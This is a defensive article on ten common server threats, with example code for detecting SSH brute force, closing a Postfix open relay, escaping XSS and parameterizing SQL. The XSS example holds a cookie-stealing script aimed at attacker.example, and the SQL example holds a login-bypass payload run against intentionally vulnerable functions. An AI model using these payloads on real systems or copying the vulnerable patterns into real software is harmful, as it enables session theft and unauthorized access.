It is easy to get a server. Anyone can set up a machine in a basement and start publishing websites. Furthermore, most web hosting companies offer leased servers and virtual private servers at affordable prices. All of this means that someone with absolutely no experience can start a server, publish websites, or even host other people's sites.
Fortunately, there are plenty of forums and online documentation to help new system administrators get started. Whether or not you are one of them, there are several security threats to Internet-connected servers that you should be aware of and know how to prevent and mitigate. These 10 threats are common ones that attackers use either to gain access to your server or to bring it to its knees.
Brute Force Attack
In a brute force attack, the intruder attempts to gain access to a server by guessing a user's password (usually the root administrator's) through the SSH server, mail server, or another service running on your system. The attacker normally uses software that tries passwords from a wordlist or every possible combination until one works. Brute force detection software watches the service logs, alerts you when multiple failed login attempts from one source are in progress, and blocks the offending IP address at the firewall. Detection is the second line of defence, though: strong passwords, key-based SSH authentication, and disabling remote root logins remove most of what the attacker is guessing at in the first place.
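The detection logic described above, as an added example that is not part of the original article: it parses OpenSSH "Failed password" lines from a syslog-style auth.log, keeps a sliding window of failures per source address, and flags any address that exceeds a threshold inside the window. The log lines are constructed samples, and the policy of 5 failures in 10 minutes is an assumed one, not an sshd default; the ban command is only built as a string, not executed.

```python
"""Sliding-window brute-force detector over sshd auth.log lines.

Added example, not code from the original article.  Sample log lines are
constructed; the 5-failures-in-10-minutes threshold is an assumed policy.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Matches the line OpenSSH logs for a failed password, e.g.
#   Mar  3 10:00:01 web1 sshd[2201]: Failed password for root from 203.0.113.7 port 50122 ssh2
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+)"
)

MAX_FAILURES = 5       # assumed policy: block after 5 failures ...
WINDOW_SECONDS = 600   # ... within any 10-minute span

# Constructed sample: one noisy attacker, one user mistyping twice,
# and one slow scanner whose 5 failures never fall inside a 10-minute window.
SAMPLE_LOG = """\
Mar  3 10:00:01 web1 sshd[2201]: Failed password for root from 203.0.113.7 port 50122 ssh2
Mar  3 10:00:03 web1 sshd[2201]: Failed password for root from 203.0.113.7 port 50122 ssh2
Mar  3 10:00:05 web1 sshd[2204]: Failed password for invalid user admin from 203.0.113.7 port 50130 ssh2
Mar  3 10:00:07 web1 sshd[2204]: Failed password for invalid user admin from 203.0.113.7 port 50130 ssh2
Mar  3 10:01:15 web1 sshd[2210]: Accepted publickey for deploy from 198.51.100.20 port 41000 ssh2
Mar  3 10:01:20 web1 sshd[2211]: Failed password for alice from 198.51.100.20 port 41002 ssh2
Mar  3 10:01:25 web1 sshd[2211]: Failed password for alice from 198.51.100.20 port 41002 ssh2
Mar  3 10:02:09 web1 sshd[2215]: Failed password for root from 203.0.113.7 port 50140 ssh2
Mar  3 10:30:00 web1 sshd[2300]: Failed password for root from 192.0.2.55 port 6000 ssh2
Mar  3 10:45:00 web1 sshd[2301]: Failed password for root from 192.0.2.55 port 6001 ssh2
Mar  3 11:00:00 web1 sshd[2302]: Failed password for root from 192.0.2.55 port 6002 ssh2
Mar  3 11:15:00 web1 sshd[2303]: Failed password for root from 192.0.2.55 port 6003 ssh2
Mar  3 11:30:00 web1 sshd[2304]: Failed password for root from 192.0.2.55 port 6004 ssh2
""".splitlines()


def parse_ts(ts, year=2024):
    """Syslog timestamps carry no year; assume one so the window arithmetic works."""
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def find_offenders(lines, max_failures=MAX_FAILURES, window=WINDOW_SECONDS):
    """Return {ip: sorted usernames tried} for each source address that reaches
    max_failures failed logins within any window-second span."""
    recent = defaultdict(deque)   # ip -> timestamps of failures still inside the window
    users = defaultdict(set)      # ip -> usernames that address has tried
    offenders = {}
    for line in lines:
        m = FAILED_RE.match(line)
        if not m:
            continue                      # successful logins and other noise are ignored
        ip, t = m["ip"], parse_ts(m["ts"])
        q = recent[ip]
        q.append(t)
        users[ip].add(m["user"])
        while (t - q[0]).total_seconds() > window:
            q.popleft()                   # drop failures that have aged out of the window
        if len(q) >= max_failures and ip not in offenders:
            offenders[ip] = sorted(users[ip])
    return offenders


def ban_command(ip):
    """The firewall rule a blocker would run for an offender (returned, not executed)."""
    return f"iptables -I INPUT -s {ip} -j DROP"


if __name__ == "__main__":
    for ip, tried in find_offenders(SAMPLE_LOG).items():
        print(f"{ip} tried {', '.join(tried)} -> {ban_command(ip)}")
```

The same windowed counting works for any service that logs authentication failures per source address (a mail server's SASL failures, for instance); only the regular expression changes. Note that the slow scanner in the sample is deliberately below the threshold: an attacker who spaces attempts out will evade a pure rate rule, which is why strong credentials matter more than the detector.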
Open Relay
A Mail Transfer Agent (MTA) accepts mail over SMTP and delivers it, both mail from your server's own users to the outside world and mail from the outside world addressed to your domains. An open relay is an MTA that will accept mail from anyone and deliver it anywhere, which means spammers can use your server to send their mail. Besides helping spammers, this will very likely get your server's IP address placed on a DNS blacklist that many mail providers use to reject mail outright, so your own users' legitimate mail will start bouncing. Closing an open relay is easy: the MTA should relay only for local addresses, your own networks, or authenticated users, and accept everything else only if it is addressed to a domain the server is responsible for. Follow the documentation for your MTA, then test from an outside address that the server refuses to relay.
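The weak setting beside the corrected one, as an added example that is not from the original article. The original names no particular MTA; this assumes Postfix (main.cf syntax, Postfix 2.10 or later, where `smtpd_relay_restrictions` exists), and the LAN range is a placeholder.

```ini
# --- Weak: treats the whole Internet as a trusted network, so anyone can relay ---
mynetworks = 0.0.0.0/0
smtpd_relay_restrictions = permit_mynetworks

# --- Corrected: relay only for loopback (add your own LAN, e.g. 192.0.2.0/24, if needed)
# and for authenticated users; anyone else may only deliver to your own domains ---
mynetworks = 127.0.0.0/8 [::1]/128
smtpd_relay_restrictions = permit_mynetworks, permit_sasl_authenticated, reject_unauth_destination
```

With the corrected settings, a client outside `mynetworks` that has not authenticated and asks to deliver to a domain not listed in `mydestination`, `relay_domains` or your virtual domains gets "Relay access denied". After a change, run `postconf -n` to confirm the effective values and then test from an outside host by attempting to send mail through your server to an unrelated address.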
Botnet
A botnet is a collection of compromised machines ("bots" or "agents") that an attacker controls remotely. Attackers use automated malware to compromise servers and enlist them as agents, then use those agents to attack or infect others. Because all of this happens automatically, without any user intervention, botnets can grow very quickly and be devastating for large networks. They are commonly used for DDoS attacks, spam campaigns, and the brute force scanning described above, so a poorly secured server is not only a victim but a recruit.
Denial of Service
DoS stands for Denial of Service, a technique attackers use to effectively shut off access to your site. They accomplish this by sending so much traffic that the victim's server, or its network link, becomes unresponsive to legitimate users. Some DoS attacks come from a single attacker; others are coordinated from many machines at once and are called Distributed Denial of Service (DDoS) attacks. Often the owners of the computers taking part in a DDoS do not even know their machines are being used as agents. Blocking a single abusive source address at the firewall works against a lone attacker; against a DDoS, where traffic arrives from thousands of addresses, you will generally need filtering upstream of your server (your hosting provider, a CDN, or a scrubbing service), because by the time the packets reach your machine its link is already saturated.
Cross-Site Scripting
Cross-site scripting, or XSS, is a technique that makes use of vulnerabilities in web applications. According to UK dedicated hosting specialists 34SP.com, the vulnerability allows an attacker to get script of their choosing into a page the application serves, so that a victim's browser runs it in the context of your site, where it can steal session cookies or other sensitive data. The root cause is untrusted input (a query parameter, a form field, a stored comment) being copied into HTML without encoding. Scanner software helps you find XSS, but the fix is in the application: encode untrusted data for the context it is inserted into (HTML body, attribute, URL), and as a second layer set a Content Security Policy so that injected inline script is not executed even if something slips through.
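The vulnerable rendering beside the hardened one, as an added example that is not code from the original article. The page fragment and the payload are constructed; `html.escape` from the standard library does the output encoding, and `safe_href` shows the caveat that encoding alone does not help in a URL attribute, where the scheme must be allow-listed as well.

```python
"""Reflected XSS: unsafe vs. encoded output in HTML text and attribute contexts.

Added example, not code from the original article.  Payloads are constructed.
"""
import html
from urllib.parse import urlsplit

# A typical cookie-stealing payload an attacker would place in a "name" parameter.
ATTACK = '<script>document.location="http://attacker.example/?c="+document.cookie</script>'


def render_greeting_unsafe(name):
    """Untrusted input pasted straight into HTML: the browser runs whatever tags it holds."""
    return f"<p>Hello, {name}!</p>"


def render_greeting_safe(name):
    """Encode for the HTML text context: < > & " ' become entities, so the
    payload is displayed as text instead of parsed as markup."""
    return f"<p>Hello, {html.escape(name, quote=True)}!</p>"


def safe_href(url):
    """Attribute context needs two things: an allow-listed scheme (escaping does
    nothing against javascript:alert(1), which contains no special characters)
    and entity encoding so the value cannot break out of the quotes."""
    if urlsplit(url).scheme.lower() not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def render_link_safe(url, label):
    return f'<a href="{safe_href(url)}">{html.escape(label, quote=True)}</a>'


if __name__ == "__main__":
    print(render_greeting_unsafe(ATTACK))   # live script tag in the page
    print(render_greeting_safe(ATTACK))     # harmless &lt;script&gt; text
    print(render_link_safe("javascript:alert(1)", "click"))
```

The safe versions are what a templating engine's auto-escaping does for you; the bugs in practice come from the places where auto-escaping is turned off (`|safe`, `Markup`, raw string concatenation into a response) and from attribute and URL contexts that need more than entity encoding.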
SQL Injection
Like XSS, SQL injection depends on a vulnerability in the web application, in this case in the way it builds database queries rather than in the database itself. Untrusted input is concatenated into a query string that is then passed to the SQL server, parsed, and executed, so the attacker's quote characters and keywords become part of the query and can change what it does: bypass a login, read other users' rows, or modify data. Scanning for problem code helps you find it, but the reliable fix is to use parameterized queries (prepared statements) everywhere, so that user data is passed to the database separately from the SQL text and never reaches the parser as code.
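The vulnerable query beside the parameterized one, as an added example that is not code from the original article. It uses an in-memory SQLite database with a constructed users table; password handling is simplified to comparing a stored hash string so that the injection itself is the only thing being shown.

```python
"""SQL injection: string-built query vs. parameterized query.

Added example, not code from the original article.  The users table and the
"hash" are constructed; real code would use a proper password hash check.
"""
import sqlite3


def make_db():
    """Constructed sample database with a single user."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'hash-of-correct-horse')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password_hash):
    """The attacker's quotes land in the SQL grammar.  With username
    "alice' --" the query becomes
        ... WHERE username = 'alice' --' AND password_hash = '...'
    and the password check is commented out."""
    sql = (
        "SELECT COUNT(*) FROM users "
        f"WHERE username = '{username}' AND password_hash = '{password_hash}'"
    )
    return conn.execute(sql).fetchone()[0] > 0


def login_safe(conn, username, password_hash):
    """Placeholders: the driver sends the values separately, so a quote in the
    username is just a character in a string, never part of the SQL."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password_hash = ?"
    return conn.execute(sql, (username, password_hash)).fetchone()[0] > 0


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, bypass payload:", login_vulnerable(db, "alice' --", "wrong"))
    print("parameterized, same payload:", login_safe(db, "alice' --", "wrong"))
```

The placeholder style differs by driver (`?` for SQLite, `%s` for psycopg2 and MySQLdb, named parameters elsewhere), but the principle is the same: never format user data into the SQL string. Identifiers such as table or column names cannot be parameterized and must come from an allow-list instead.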
Malware
Malware can take many forms, but as the name implies, it is malicious software: viruses, bots, spyware, worms, trojans, rootkits, and any other software intended to cause harm. In most cases it is installed without the user's knowledge or consent, often through one of the other vulnerabilities on this list. Once on a server it may attack that machine, steal what it holds, or use it to attack other systems. A properly configured firewall, least-privilege service accounts, and host security software (file integrity checking, rootkit scanners, and anti-virus where relevant) help prevent malware from getting a foothold and from spreading once it does.
Unpatched Software
Most threats to a server can be prevented simply by running up-to-date, properly patched software. All server operating system vendors and distributions publish security updates, and so do the authors of the web applications you host, which are just as exposed. By installing updates in a timely manner, you deny attackers the chance to use your server's own known vulnerabilities against it; most mass exploitation targets flaws for which a patch has existed for weeks or months.
User Carelessness
The most prevalent threat to a server's security is user carelessness. If you or your users have passwords that are easy to guess, poorly written code, unpatched software, or a lack of basic security measures such as firewalls and anti-virus software, you are asking for trouble. By enforcing strong security practices and secure authentication, you can lessen or even eliminate most of the threats above.